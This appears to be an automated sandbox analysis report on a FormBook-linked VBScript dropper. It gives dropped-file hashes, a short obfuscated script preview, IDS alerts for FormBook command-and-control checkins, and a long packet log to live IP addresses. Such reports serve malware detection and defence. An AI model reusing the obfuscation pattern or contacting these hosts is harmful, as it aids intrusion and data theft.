                              Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.
                              Process:C:\Windows\System32\wscript.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):330
                              Entropy (8bit):3.221708400245809
                              Encrypted:false
                              SSDEEP:6:kKhGOXlEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:pGOXlbkPlE99SNxAhUeVLVt
                              MD5:10CC8E4171181F40D3F3902F346989CF
                              SHA1:C6C21A031D7A5C0F69B96092C19E833F685CB2CF
                              SHA-256:103BCC6A1183F4644E456B6E4FBC8113C71830BD3ED212D8AF238BAAB63FA1D6
                              SHA-512:CA5DD1E1B785CE5A1339B3B5A3A6254E781E93D8D7596BD3ABD7876E832D0B740795656856FE008C92F4B40409C5EACE36B0D8F5E436C2FAA6AFD15996E16344
                              Malicious:false
                              Preview:p...... ...........:....(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:modified
                              Size (bytes):11608
                              Entropy (8bit):4.886255615007755
                              Encrypted:false
                              SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                              MD5:C7F7A26360E678A83AFAB85054B538EA
                              SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                              SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                              SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                              Malicious:false
                              Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1940658735648508
                              Encrypted:false
                              SSDEEP:3:Nlllulbnolz:NllUc
                              MD5:F23953D4A58E404FCB67ADD0C45EB27A
                              SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                              SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                              SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                              Malicious:false
                              Preview:@...e................................................@..........
                              Process:C:\Windows\SysWOW64\xcopy.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                              Category:dropped
                              Size (bytes):196608
                              Entropy (8bit):1.1239949490932863
                              Encrypted:false
                              SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                              MD5:271D5F995996735B01672CF227C81C17
                              SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                              SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                              SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                              Malicious:false
                              Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:dropped
                              Size (bytes):464360
                              Entropy (8bit):5.959627268998177
                              Encrypted:false
                              SSDEEP:12288:3+Y872BjWy9pqF42Kt0g8Ic9P3oX+3YHJW09:3+7CBayTO8IP3oXVwA
                              MD5:C7906DD3AFFB5AB9D5B82F6E14064C4B
                              SHA1:BDC1903A713B8E82E10D1ACADA68110988885416
                              SHA-256:1BE80920D652FC9BF4CD1A46EEFCDED743B7D37B3EED7C13446974119BBD1795
                              SHA-512:AB65FEBD4EC13BC44A818D61585E7C072C2C4C4723E3F469004DB860A5135CA3BDD1AC0037938C68D38FDA920D59F73332213A3801F104DAD17EDB82338613B5
                              Malicious:false
                              File type:ASCII text, with very long lines (604), with CRLF line terminators
                              Entropy (8bit):5.156113050019584
                              TrID:
                                File name:01105751.vbs
                                File size:215'050 bytes
                                MD5:5c7e4886e009c7d2908ec633bf48cf8e
                                SHA1:72e9f5c65571b19402febfa7f36fc6ee5ce9a0f3
                                SHA256:c950aba2061fbb90b63122bec04b71764966e5554b6cd40114772c392464f748
                                SHA512:e7910dd42402712860ff660e699707d3c0ae6e4ba8eb8292a8a01de8a22a78bd86272f9668ae4fe260c9af499bbc8477d8d8df115a917040606be6c9cb7736f1
                                SSDEEP:6144:wyJITON4vsj1oLXVAFN6oDpLfcW6PGOYQO+17ezWSUqE19eAV/KE3JSlkiuqIQKi:lcKJkRH3Y
                                TLSH:0B24B3E3CF0A36181F8A2FC5A865CD828AF741B171152478D5EED6EDA183EACC1F8D15
                                File Content Preview:.. ..Rem stningsled aporobranchian lorgnettere brnesygdommes. udliciterings.. .. .. .. .. ..Rem Harmoniseres! ildnendes placarder swaddler sjuskedorter..Ha1 = Ha1 + "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytri
                                Icon Hash:68d69b8f86ab9a86
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/02/24-17:15:19.980855 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49727 | 80 | 192.168.2.6 | 3.33.130.190
05/02/24-17:15:22.949006 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49728 | 80 | 192.168.2.6 | 3.33.130.190
05/02/24-17:15:04.232595 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49725 | 80 | 192.168.2.6 | 34.174.122.2
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 2, 2024 17:13:09.641093016 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:09.808796883 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:09.809367895 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:09.809696913 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:09.978557110 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:09.982659101 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:09.982822895 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:09.982934952 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:09.983073950 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:09.983124971 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:09.983200073 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:09.983206034 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:09.983253002 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:09.983308077 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:09.983361006 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:09.983371973 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:09.983428001 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:09.983489037 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:09.983491898 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:09.983829021 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.150049925 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.150115967 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.150154114 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.150228977 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.150238037 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.150302887 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.150304079 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.150392056 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.150448084 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.150497913 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.150520086 CEST | 49713 | 80 | 192.168.2.6 | 87.121.105.54
May 2, 2024 17:13:10.150573969 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
May 2, 2024 17:13:10.150593996 CEST | 80 | 49713 | 87.121.105.54 | 192.168.2.6
                                May 2, 2024 17:13:10.150625944 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.150640011 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.150667906 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150722027 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150752068 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150829077 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.150832891 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150865078 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150930882 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150965929 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.150978088 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.150980949 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.151031971 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.151082993 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.151146889 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.151236057 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.151290894 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.318186045 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318231106 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318269014 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318289995 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.318321943 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318396091 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318423986 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.318456888 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318567991 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318617105 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.318665028 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318723917 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.318778992 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318855047 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.318907022 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.318955898 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319015026 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319072962 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319088936 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.319163084 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319195986 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319242001 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.319273949 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319319963 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.319403887 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319482088 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319540977 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.319561005 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319623947 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319681883 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.319689035 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319742918 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319801092 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.319809914 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319859028 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319933891 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.319936037 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.320035934 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320080996 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320095062 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.320179939 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320228100 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.320265055 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320394993 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320452929 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.320455074 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320549011 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320614100 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.320635080 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320696115 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320760965 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.320768118 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320791006 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320839882 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.320861101 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320921898 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.320974112 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.320986986 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.321074963 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.321119070 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.487401009 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.487566948 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.487647057 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.487855911 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488020897 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488034010 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488045931 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488056898 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488069057 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488080025 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.488080025 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488171101 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.488171101 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.488704920 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488718033 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488728046 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488759041 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.488794088 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.488866091 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488878012 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488888979 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.488960981 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.489214897 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.489227057 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.489237070 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.489248037 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.489259005 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.489269972 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.489274979 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.489281893 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.489320040 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.489320040 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.489362955 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490025043 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490036964 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490048885 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490065098 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490072012 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.490076065 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490087986 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490089893 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.490102053 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490113020 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490123034 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.490153074 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.490828037 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.490881920 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.491112947 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.491125107 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.491137028 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.491147995 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.491159916 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.491166115 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.491173029 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.491209030 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.491269112 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.491889954 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492037058 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492048979 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492059946 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492070913 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492082119 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492093086 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492115021 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.492115021 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.492119074 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492157936 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.492158890 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.492178917 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492651939 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.492707014 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.492841959 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.493202925 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.493215084 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.493271112 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.493344069 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.493355036 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.493366003 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.493376970 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.493401051 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.493419886 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.493521929 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.493582964 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.493746042 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.493906975 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.493917942 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.493984938 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.494059086 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.494071960 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.494138002 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.494199991 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.494211912 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.494261026 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.494374990 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.494430065 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.494560003 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.494571924 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.494582891 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.494645119 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.494720936 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.494733095 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.494786978 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.494879007 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.494890928 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.494941950 CEST4971380192.168.2.687.121.105.54
                                May 2, 2024 17:13:10.495027065 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.495038986 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.495049000 CEST804971387.121.105.54192.168.2.6
                                May 2, 2024 17:13:10.495059967 CEST804971387.121.105.54192.168.2.6
